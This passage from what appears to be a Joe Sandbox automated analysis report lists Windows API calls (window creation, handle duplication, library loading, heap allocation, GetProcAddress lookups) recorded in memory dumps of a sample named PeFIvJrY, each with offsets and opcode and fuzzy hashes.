                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06303042
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: b997773d4bab37a79afce630c2513ae074c1f9ba4867644001bb1366a763a6b7
                                • Instruction ID: 51b09446ad57a0ac32003e5ad4f7dd5f8f6b8c3cc7314aedc2d9aa4942148c72
                                • Opcode Fuzzy Hash: b997773d4bab37a79afce630c2513ae074c1f9ba4867644001bb1366a763a6b7
                                • Instruction Fuzzy Hash: 5A41B0B1D103099FEB14CF9AC894ADEBBB5BF48310F24812AE819AB250D775A945CF90
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06305741
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 07c4f9938a7f52bb7c4c0f7bda1b1f890aaa0e71f64926b359a83b98d17cdffa
                                • Instruction ID: d8de8691b55c51537ac3a226c8cff9b64c5e222367de37c58a153d7d68d612ab
                                • Opcode Fuzzy Hash: 07c4f9938a7f52bb7c4c0f7bda1b1f890aaa0e71f64926b359a83b98d17cdffa
                                • Instruction Fuzzy Hash: EF413AB8900309CFDB54CF99C588BAABBF5FB88314F24C459D519AB361D774A845CFA0
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 025B8021
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3846304760.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_25b0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 3faffc73fcf6b6efbec57ce96dfc312f8d8786a8a6ac4e118a26712322db5393
                                • Instruction ID: 9c8ab84deaef80c94ae7b1d582e57c20deaf9bf811b3141a49fbad37f0712edb
                                • Opcode Fuzzy Hash: 3faffc73fcf6b6efbec57ce96dfc312f8d8786a8a6ac4e118a26712322db5393
                                • Instruction Fuzzy Hash: 3941CF70C0071DCBEB25CFA9C848BDEBBB5BF49304F20856AD408AB261DB756945CF94
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 025B8021
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3846304760.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_25b0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 5f985ccec58869d7315e19dc66b28216e996fdb3bc6d3a25e9f6d509c7c601d0
                                • Instruction ID: ffaf8c80497fb23c40ded849b4ec17058c31e3d4a379fedd88ae77565700e31e
                                • Opcode Fuzzy Hash: 5f985ccec58869d7315e19dc66b28216e996fdb3bc6d3a25e9f6d509c7c601d0
                                • Instruction Fuzzy Hash: CA41BFB0C00719CBEB25CFA9C8887DEFBB5BF49304F20856AD408AB265DB756946CF51
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0632A487
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: d52dc4743c52ef5745af7e6b87d8403e99592a606593423d634d5ea69da83755
                                • Instruction ID: d7074a77f116b8ecaee890e9e3ffbb98f9678a9945126d5643a7cc9a3668daef
                                • Opcode Fuzzy Hash: d52dc4743c52ef5745af7e6b87d8403e99592a606593423d634d5ea69da83755
                                • Instruction Fuzzy Hash: FC21E4B5900309AFDB10CF9AD884BDEBBF4EB48310F14841AE958A7350D378A954CFA4
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0632A487
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: ae632afc12397a7e04b7b6df49de357ba77019d86e1982c57bdb8eb4229ba97c
                                • Instruction ID: b8c17f16988f26f295423dcfe1ce6f60d126e348a149a8b21dda7d771512cc13
                                • Opcode Fuzzy Hash: ae632afc12397a7e04b7b6df49de357ba77019d86e1982c57bdb8eb4229ba97c
                                • Instruction Fuzzy Hash: 1B21E4B59003099FDB10CF9AD884ADEBBF4EB48310F14841AE918A7350D374A954CFA0
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06301029,00000800,00000000,00000000), ref: 0630121A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 038bdd5c61b8f914c48fb956356a1a2859d19dd639fc25a23096a2701a052aff
                                • Instruction ID: 66ec4ada8410ad7fd8b64bbbea0541d9a6b06caed3f808fab18b2a4f115dd541
                                • Opcode Fuzzy Hash: 038bdd5c61b8f914c48fb956356a1a2859d19dd639fc25a23096a2701a052aff
                                • Instruction Fuzzy Hash: 151103B6C003498FDB14CF9AD444BDEFBF8AB48310F10842AE519A7640C375A549CFA4
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06301029,00000800,00000000,00000000), ref: 0630121A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: e78744aaedef13b8c2d3d10a1aa1c9d389ced71dc696753a3686b5593f30ada2
                                • Instruction ID: 96acc353ac42cee0229d6b2a09471fc14b8bb6dbe489d0e76ae2936c884d5b3b
                                • Opcode Fuzzy Hash: e78744aaedef13b8c2d3d10a1aa1c9d389ced71dc696753a3686b5593f30ada2
                                • Instruction Fuzzy Hash: 4B1100B68002498FDB14CF9AC844BDEFBF8AB49310F14842AE419A7640C375A549CFA4
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 06300FAE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 35ee04132cd63338c62cd7cd3159122c82cd47827ad130d5efa6dbda39dd0737
                                • Instruction ID: 81235a7c9d2be7fb5d76ff1335ebdef0fec5074979eb8b069cc9709fd954eb39
                                • Opcode Fuzzy Hash: 35ee04132cd63338c62cd7cd3159122c82cd47827ad130d5efa6dbda39dd0737
                                • Instruction Fuzzy Hash: 411110B5C003498FDB14CF9AC444BDEFBF8AB88214F10842AD459A7740C379A549CFA5
                                APIs
                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0630809F), ref: 06308F45
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DispatchMessage
                                • String ID:
                                • API String ID: 2061451462-0
                                • Opcode ID: 0db9069395429b96cff1e6f6a5be16f159bb1402b5fd32c987f98898310f1f54
                                • Instruction ID: 872e651a57b671b4b5118e4ab2b96819db210dda4377dbf6c68f2dd24d2d93a9
                                • Opcode Fuzzy Hash: 0db9069395429b96cff1e6f6a5be16f159bb1402b5fd32c987f98898310f1f54
                                • Instruction Fuzzy Hash: BF11FEB5C046498FDB20CF9AD448BDEFBF9AB48320F10856AE918A7750D378A544CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06307BB5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 4578f347054d4ad96efe68e6b747d219bc833b5d3f45087cdcbcec29db1c6fb6
                                • Instruction ID: 41912ce9ce024e92cb49340fb56504677949ba207cf4e78eb6bb0eadad3f64b3
                                • Opcode Fuzzy Hash: 4578f347054d4ad96efe68e6b747d219bc833b5d3f45087cdcbcec29db1c6fb6
                                • Instruction Fuzzy Hash: 651142B4800348CFDB20DF9AD489BDEBBF8EB48220F20845AD518A7740D378A944CFA4
                                APIs
                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0630809F), ref: 06308F45
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DispatchMessage
                                • String ID:
                                • API String ID: 2061451462-0
                                • Opcode ID: cf94a390c4a9c1572b2cb9b080706caeff1f6d46f1a870928fb29d35b02fbde1
                                • Instruction ID: 3f234ef19cf71468e5af9252b7d2adbbdbd17f0bbcac81aa2b9eaad60cce97ea
                                • Opcode Fuzzy Hash: cf94a390c4a9c1572b2cb9b080706caeff1f6d46f1a870928fb29d35b02fbde1
                                • Instruction Fuzzy Hash: 9E112EB5C046488FDB20CF9AD448BDEFBF8EB48320F10846AE518A7750D378A508CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06307BB5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 623acbc88e341a5d8fe633261d64b6d9cc93d0266c72e2515638295be190d3b4
                                • Instruction ID: 23e55622860e89174e819491f04b6932a8d2dbedc8051210de2a10efd4efbb88
                                • Opcode Fuzzy Hash: 623acbc88e341a5d8fe633261d64b6d9cc93d0266c72e2515638295be190d3b4
                                • Instruction Fuzzy Hash: 4B1112B58003498FDB20CFAAD489BDEFBF4EB48324F20845AD558A7740D378A544CFA5
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?), ref: 004313D9
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: c5f4a86e8a4d4392b3b07242df14a2361b1ecd91d25f74fb375eff19f6018c4c
                                • Instruction ID: 116d43c0027fab8f02176f6f339d49ec1ebfe4c425a1b28e09bb3723c004e037
                                • Opcode Fuzzy Hash: c5f4a86e8a4d4392b3b07242df14a2361b1ecd91d25f74fb375eff19f6018c4c
                                • Instruction Fuzzy Hash: 80F0E936604234A7FB211B73AC45B5B37489F49BA0F149127EC14E7AB0DABCDC0146ED
                                APIs
                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,A05DD77D), ref: 003FB830
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FormatMessage
                                • String ID:
                                • API String ID: 1306739567-0
                                • Opcode ID: cb7a35d3d07401d8c85e11f35a6dd87efa47410ea05a3aa82c3b545efc86bd0e
                                • Instruction ID: ed5448e6f11966e2b5cf9ce9704642e35aa85d8dbdf5f314436787a3123e9ba5
                                • Opcode Fuzzy Hash: cb7a35d3d07401d8c85e11f35a6dd87efa47410ea05a3aa82c3b545efc86bd0e
                                • Instruction Fuzzy Hash: 12F08176904208FBCB11CF94DC41F9BBBB8FB09720F20462AF911922D0D37555108B54
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0043026D
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: d8bde64b67a0e67c27e30316ac598e1c67297a40a5b27b132b0e94f48ce3e6a8
                                • Instruction ID: afe4a215af5e75f5bcbc76fdceaa7de5f17a671192b5524ebe786f8414be2f78
                                • Opcode Fuzzy Hash: d8bde64b67a0e67c27e30316ac598e1c67297a40a5b27b132b0e94f48ce3e6a8
                                • Instruction Fuzzy Hash: B0E0E5252043356AEB3126736C1CB5B76489B4ABA0F0512A3AD1496282DBBCCC0183ED
                                APIs
                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0040A088), ref: 00424D01
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InfoNativeSystem
                                • String ID:
                                • API String ID: 1721193555-0
                                • Opcode ID: d056cd09ade1b75375c985e3e9867a308bc472b29ce754fe8a4b8ebc8da1f5ab
                                • Instruction ID: 749b4d5a07bdd073ea54b677259e93ab06eaf1f88673129a773f6a235982741f
                                • Opcode Fuzzy Hash: d056cd09ade1b75375c985e3e9867a308bc472b29ce754fe8a4b8ebc8da1f5ab
                                • Instruction Fuzzy Hash: 31C09B7590410D97CB00E7E5D94988EB7FCA609204B400461D911E3140F671F95D8795
                                APIs
                                  • Part of subcall function 003FB7E0: FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,A05DD77D), ref: 003FB830
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0043C050,000000FF), ref: 003FBAC9
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: 0d14172fe12f1e7c40e01c70737c15cd0bb5738b55280c739ef8c62129090080
                                • Instruction ID: 1e6a2c88d6d768fb835193bb855e87ed5723f23eb09df8104a97d25694f83234
                                • Opcode Fuzzy Hash: 0d14172fe12f1e7c40e01c70737c15cd0bb5738b55280c739ef8c62129090080
                                • Instruction Fuzzy Hash: 6D71B1B0D01359DBDB26DF15C849BA9F7B8AF44344F1441DADA48AB242E770AF84CF91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3842594588.000000000257D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0257D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_257d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a35369969376b47e717fafb18f8c7de68a89c816908f7e4828000a81188059b8
                                • Instruction ID: 7bfb8b31fdf5c82c20ff0b2a83918e326a1fa921757880faeef47014a2473249
                                • Opcode Fuzzy Hash: a35369969376b47e717fafb18f8c7de68a89c816908f7e4828000a81188059b8
                                • Instruction Fuzzy Hash: F6210372544244DFDB18DF10E9C4B26BF76FF84314F24C5B9E9090B246C3B6E856CAA2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3843285956.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_258d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e0702e681b9861feaf833a8066b6f5615769b7220dcf38ffc26075fc3e72db2
                                • Instruction ID: b68f05504c4eb4bcbcea6591989a85cf320223a6aad86634e933aaccbffa7deb
                                • Opcode Fuzzy Hash: 9e0702e681b9861feaf833a8066b6f5615769b7220dcf38ffc26075fc3e72db2
                                • Instruction Fuzzy Hash: B021F571504344DFEB04EF20D9C0B26BBB5FF88314F24C569D8095B2D6C7BAD846CA65
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3843285956.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_258d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d1afcc781a9a20e73cf7bbc6dd3a0ccad95a257044737484cebe8f1fea1cc3ff
                                • Instruction ID: 19bf394b19f83231955cd10979d68b22828b925f24e05ca2e78caef0a2817b00
                                • Opcode Fuzzy Hash: d1afcc781a9a20e73cf7bbc6dd3a0ccad95a257044737484cebe8f1fea1cc3ff
                                • Instruction Fuzzy Hash: 4F11E1B1A05344DFEB14FF34D984B36BBE5FB44204F208A69D40A5B2C1E3BAD446C666
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3842594588.000000000257D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0257D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_257d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e42ba21dd85538f86204e361e271b9c377ec2a0e9d4622c41ef75d55fb34e3d1
                                • Instruction ID: 9d63d3633e8e8088ee21eb2ad798e4ddd4feac97cadc57894db491ed08fc311d
                                • Opcode Fuzzy Hash: e42ba21dd85538f86204e361e271b9c377ec2a0e9d4622c41ef75d55fb34e3d1
                                • Instruction Fuzzy Hash: 5211E172404280CFCB15CF10E5C4B16BF72FF84324F24C1A9D8090B656C37AE456CBA1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3843285956.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_258d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 22d9767f7ba1f0a1249a8eae63377083295f748490133a4ba73ae3ceb724cb7c
                                • Instruction ID: 86d7f406d58170a11204f330c21c22a7959a0a39a131ea1c1124b3469f3527aa
                                • Opcode Fuzzy Hash: 22d9767f7ba1f0a1249a8eae63377083295f748490133a4ba73ae3ceb724cb7c
                                • Instruction Fuzzy Hash: 4C11B27150A3C4CFDB12EF34D594725BFB0FB42214F2885EAC4898B293D37A844AC762
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3843285956.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_258d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25fd3f2d3cf64367ab4aa6a3e4fd855283cda72dbe6d9a978ba3e59e4b138002
                                • Instruction ID: 2d76e3f9df07c4cf1f06749dc85ce1f3a317c56b36e7d9fe2e747a7d1562625e
                                • Opcode Fuzzy Hash: 25fd3f2d3cf64367ab4aa6a3e4fd855283cda72dbe6d9a978ba3e59e4b138002
                                • Instruction Fuzzy Hash: 78118B75504284DFDB05DF20D9C4B25BFB1FF88218F28C6AAD8494B696C37AD44ACBA1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849000279.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5450000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dac22bb97d797a7f5d4bbbb30819df5719b3a00245c57462d9f3f00461464311
                                • Instruction ID: c7dc535d8f32cfd4ab923ca47bebf0ec00104d34f085040d03a30d61a5dd7820
                                • Opcode Fuzzy Hash: dac22bb97d797a7f5d4bbbb30819df5719b3a00245c57462d9f3f00461464311
                                • Instruction Fuzzy Hash: 0EE0E26150E7C54FD3438B758C696903F309F27248B0E02EBD4C5CF1B3D6199909CB22
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849000279.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5450000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
                                • Instruction ID: 38f246181df111d5429a8bd68a772e0fce3d181c3253e5a9de7ce3dab65c4b62
                                • Opcode Fuzzy Hash: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
                                • Instruction Fuzzy Hash: F4B01230240208CFC300DB5DD445C003BFCAF49A0434000D0F1088B731C721FC008A40
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00425372
                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00425380
                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00425391
                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004253A2
                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004253B3
                                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004253C4
                                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 004253D5
                                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004253E6
                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 004253F7
                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00425408
                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00425419
                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0042542A
                                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0042543B
                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0042544C
                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0042545D
                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0042546E
                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0042547F
                                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00425490
                                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 004254A1
                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 004254B2
                                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 004254C3
                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 004254D4
                                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 004254E5
                                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 004254F6
                                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00425507
                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00425518
                                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00425529
                                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0042553A
                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0042554B
                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0042555C
                                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0042556D
